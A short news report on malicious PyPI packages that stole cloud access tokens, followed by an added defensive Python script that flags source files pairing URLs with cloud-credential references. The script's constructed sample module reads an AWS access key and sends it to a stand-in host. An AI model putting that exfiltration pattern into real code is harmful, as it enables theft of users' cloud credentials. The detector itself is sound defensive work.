
Thousands impacted by data exfiltrating PyPI packages


More than 14,100 users have been compromised with malicious Python Package Index packages that sought to pilfer cloud access tokens and other sensitive data before being removed from the repository, reports The Hacker News.

More than a quarter of the bogus packages posed as time-related utilities and were used to exfiltrate data to attacker-controlled infrastructure, while most of the remaining packages posed as cloud client libraries for cloud services, according to a ReversingLabs analysis.

Further examination of the nefarious packages revealed three to be dependencies of the widely used accesskey_tools project on GitHub.

Such findings come after Fortinet FortiGuard Labs reported that thousands of PyPI and npm packages had been used to carry out malicious code injection.

"Suspicious URLs are a key indicator of potentially malicious packages, as they are often used to download additional payloads or establish communication with command-and-control (C&C) servers, giving attackers control over infected systems," said Fortinet FortiGuard Labs researcher Jenna Wang.
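A minimal static check that applies this heuristic, pairing embedded URLs with references to cloud credential sources, is shown below. It is an added example, not code from the article, ReversingLabs or Fortinet; the two modules it scans are constructed, and the credential-hint list is illustrative.

```python
import ast
import re

# Embedded http(s) URLs: the indicator Fortinet's researcher describes.
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)

# Well-known places cloud access tokens live (real names; illustrative, not exhaustive).
CREDENTIAL_HINTS = (
    "AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN",
    "GOOGLE_APPLICATION_CREDENTIALS", "AZURE_CLIENT_SECRET",
    ".aws/credentials", ".config/gcloud",
)


def triage_source(source: str) -> dict:
    """Statically triage one Python source file.

    Walks the AST and inspects every string literal, so indicators are found
    whether they sit in code, docstrings or default arguments. `suspicious`
    is set when a file both names a credential source and carries a URL.
    """
    urls, hints = set(), set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            urls.update(URL_RE.findall(node.value))
            hints.update(h for h in CREDENTIAL_HINTS if h in node.value)
    return {
        "urls": sorted(urls),
        "credential_hints": sorted(hints),
        "suspicious": bool(urls) and bool(hints),
    }


# Constructed sample: a "time utility" whose extra function touches an AWS key
# and an outbound URL, the combination the article's packages relied on.
SAMPLE_TIME_UTIL = '''
import os, time, urllib.request

def now_ms():
    return int(time.time() * 1000)

def _telemetry():
    key = os.environ.get("AWS_ACCESS_KEY_ID", "")
    urllib.request.urlopen("http://example.invalid/collect?k=" + key)
'''

# Constructed benign sample: same public API, no indicators.
SAMPLE_BENIGN = "import time\n\ndef now_ms():\n    return int(time.time() * 1000)\n"
```

Running `triage_source` over each file of an unpacked sdist or wheel flags candidates for manual review; it is a triage aid, since a URL alone is common in legitimate packages and the check only pairs it with a credential reference.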
